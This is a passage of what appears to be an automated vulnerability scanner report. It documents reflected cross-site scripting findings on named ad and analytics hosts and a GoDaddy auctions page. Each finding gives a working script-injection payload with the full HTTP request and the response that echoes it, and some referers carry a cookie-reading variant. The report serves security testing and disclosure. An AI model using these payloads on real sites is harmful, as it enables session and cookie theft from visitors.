Cache-Control: private, x-gzip-ok=""
Content-Length: 7279

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
jh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=162c53"-alert(1)-"9354907b3e&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode =
...[SNIP]...

4.13. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.3 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.3

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ee8f"-alert(1)-"cfa1a2cd9c1 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBA4fyLepTdTNGtud6Abe4J2CDtT-5fsBlMzB_CX0n4eicQAQARgBIL7O5Q04AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wO6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw7ee8f"-alert(1)-"cfa1a2cd9c1&client=ca-pub-4063878933780912&adurl=;ord=1349914408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1302986276&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fxss-dork-lawyers-cross-site-scripting-poc-example-report.html&dt=1302968274562&bpp=5&shv=r20110406&jsv=r20110412&correlator=1302968276072&frm=0&adk=1607234649&ga_vid=217450935.1302968278&ga_sid=1302968278&ga_hid=1316019502&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1000&eid=36815001&fu=0&ifi=1&dtd=6355&xpc=7QG1qV76FG&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 16 Apr 2011 15:39:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7283

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
L2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw7ee8f"-alert(1)-"cfa1a2cd9c1&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallows
...[SNIP]...

4.14. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.3 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40f27"-alert(1)-"12d3ff8d5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l40f27"-alert(1)-"12d3ff8d5&ai=BBA4fyLepTdTNGtud6Abe4J2CDtT-5fsBlMzB_CX0n4eicQAQARgBIL7O5Q04AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wO6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912&adurl=;ord=1349914408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1302986276&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fxss-dork-lawyers-cross-site-scripting-poc-example-report.html&dt=1302968274562&bpp=5&shv=r20110406&jsv=r20110412&correlator=1302968276072&frm=0&adk=1607234649&ga_vid=217450935.1302968278&ga_sid=1302968278&ga_hid=1316019502&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1000&eid=36815001&fu=0&ifi=1&dtd=6355&xpc=7QG1qV76FG&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 16 Apr 2011 15:38:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7275

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aeb/f/1c2/%2a/e%3B239614143%3B0-0%3B0%3B62445293%3B3454-728/90%3B41577488/41595275/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l40f27"-alert(1)-"12d3ff8d5&ai=BBA4fyLepTdTNGtud6Abe4J2CDtT-5fsBlMzB_CX0n4eicQAQARgBIL7O5Q04AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wO6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0
...[SNIP]...

4.15. http://ads.adxpose.com/ads/ads.js [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload b617a<script>alert(1)</script>d0fbd595a25 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_321611b617a<script>alert(1)</script>d0fbd595a25 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/martindale.lawyer.locator.dart/ll_cpm_skyscraper;sz=160x600;ord=3737712935544550400?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0764E8067AD048B1710A67299AA363A4; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Set-Cookie: evlu=c6c75b6e-8553-43d3-8fc7-6ddce47cdd98; Domain=adxpose.com; Expires=Thu, 04-May-2079 17:03:21 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 13:49:13 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
_LOG_EVENT__("000_000_3",b,j,"",Math.round(Y.left)+","+Math.round(Y.top),O+","+I,C,l,m,v,S,c)}}t=p.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_ZC45X9Axu6NOUFfX_321611b617a<script>alert(1)</script>d0fbd595a25".replace(/[^\w\d]/g,""),"ZC45X9Axu6NOUFfX_321611b617a<script>
...[SNIP]...

4.16. https://auctions.godaddy.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://auctions.godaddy.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0fc6"%3balert(1)//e92a6e136cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b0fc6";alert(1)//e92a6e136cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b0fc6"%3balert(1)//e92a6e136cf=1 HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 252812
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=sbhw2g45lra5ew55khjmd0n1; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=M1PWTDNAMWEB004&status=200 OK&querystring=b0fc6%22%3balert(1)%2f%2fe92a6e136cf=1&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
Date: Sat, 16 Apr 2011 13:57:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00_Head1"><tit
...[SNIP]...
<script type="text/javascript">
               function AddMembershipToCart()
               {
                   setCookie("IDPLoginRedirect", "https://auctions.godaddy.com/trpHome.aspx?b0fc6";alert(1)//e92a6e136cf=1");
                   if (document.getElementById("ctl00_cphMaster_tbBidAmount"))
                   { setCookie("IDPBid", document.getElementById("ctl00_cphMaster_tbBidAmount").value); }
                   else if (document.getElementBy
...[SNIP]...

4.17. https://auctions.godaddy.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://auctions.godaddy.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bcc8"><script>alert(1)</script>deeb52d7f31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?7bcc8"><script>alert(1)</script>deeb52d7f31=1 HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 253492
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=yafoqa55zfssbv55lwxafz55; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=M1PWTDNAMWEB004&status=200 OK&querystring=7bcc8%22%3e%3cscript%3ealert(1)%3c%2fscript%3edeeb52d7f31=1&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
Date: Sat, 16 Apr 2011 13:57:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00_Head1"><tit
...[SNIP]...
keyCode = event.keyCode ? event.keyCode : event.which ? event.which : event.charCode; if (keyCode == 13){ RecordClick(event, '22362', '');createFormAndSubmit('https://auctions.godaddy.com/trpHome.aspx?7bcc8"><script>alert(1)</script>deeb52d7f31=1');return false;}" />
...[SNIP]...

4.18. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload ae283<script>alert(1)</script>2c0f2ef6ff was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2ae283<script>alert(1)</script>2c0f2ef6ff&c2=3005693&c3=3&c4=http%3A%2F%2Falltop.com%2F&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:11 GMT
Date: Sat, 16 Apr 2011 13:51:11 GMT
Connection: close
Content-Length: 1252

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2ae283<script>alert(1)</script>2c0f2ef6ff", c2:"3005693", c3:"3", c4:"http://alltop.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.19. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload b5161<script>alert(1)</script>029ad526e2b was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=3&c4=http%3A%2F%2Falltop.com%2F&c5=&c6=&c10=b5161<script>alert(1)</script>029ad526e2b&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:17 GMT
Date: Sat, 16 Apr 2011 13:51:17 GMT
Connection: close
Content-Length: 1253

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"3", c4:"http://alltop.com/", c5:"", c6:"", c10:"b5161<script>alert(1)</script>029ad526e2b", c15:"", c16:"", r:""});



4.20. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 90e71<script>alert(1)</script>bdd122ed418 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=3005693&c3=3&c4=http%3A%2F%2Falltop.com%2F&c5=&c6=&c15=90e71<script>alert(1)</script>bdd122ed418 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:15 GMT
Date: Sat, 16 Apr 2011 13:51:15 GMT
Connection: close
Content-Length: 3607

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"3005693", c3:"3", c4:"http://alltop.com/", c5:"", c6:"", c10:"", c15:"90e71<script>alert(1)</script>bdd122ed418", c16:"", r:""});



4.21. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 93f7e<script>alert(1)</script>4815f34f790 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=300569393f7e<script>alert(1)</script>4815f34f790&c3=3&c4=http%3A%2F%2Falltop.com%2F&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:12 GMT
Date: Sat, 16 Apr 2011 13:51:12 GMT
Connection: close
Content-Length: 3607

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"300569393f7e<script>alert(1)</script>4815f34f790", c3:"3", c4:"http://alltop.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.22. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 28299<script>alert(1)</script>55b70b1e4ba was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=3005693&c3=328299<script>alert(1)</script>55b70b1e4ba&c4=http%3A%2F%2Falltop.com%2F&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:12 GMT
Date: Sat, 16 Apr 2011 13:51:12 GMT
Connection: close
Content-Length: 3607

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"3005693", c3:"328299<script>alert(1)</script>55b70b1e4ba", c4:"http://alltop.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.23. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 908bc<script>alert(1)</script>b3a96683e20 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=3005693&c3=3&c4=http%3A%2F%2Falltop.com%2F908bc<script>alert(1)</script>b3a96683e20&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:13 GMT
Date: Sat, 16 Apr 2011 13:51:13 GMT
Connection: close
Content-Length: 3607

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
core;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"3005693", c3:"3", c4:"http://alltop.com/908bc<script>alert(1)</script>b3a96683e20", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.24. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 36087<script>alert(1)</script>c08dcabcf01 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=3005693&c3=3&c4=http%3A%2F%2Falltop.com%2F&c5=36087<script>alert(1)</script>c08dcabcf01&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:14 GMT
Date: Sat, 16 Apr 2011 13:51:14 GMT
Connection: close
Content-Length: 3607

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
r(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"3005693", c3:"3", c4:"http://alltop.com/", c5:"36087<script>alert(1)</script>c08dcabcf01", c6:"", c10:"", c15:"", c16:"", r:""});



4.25. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

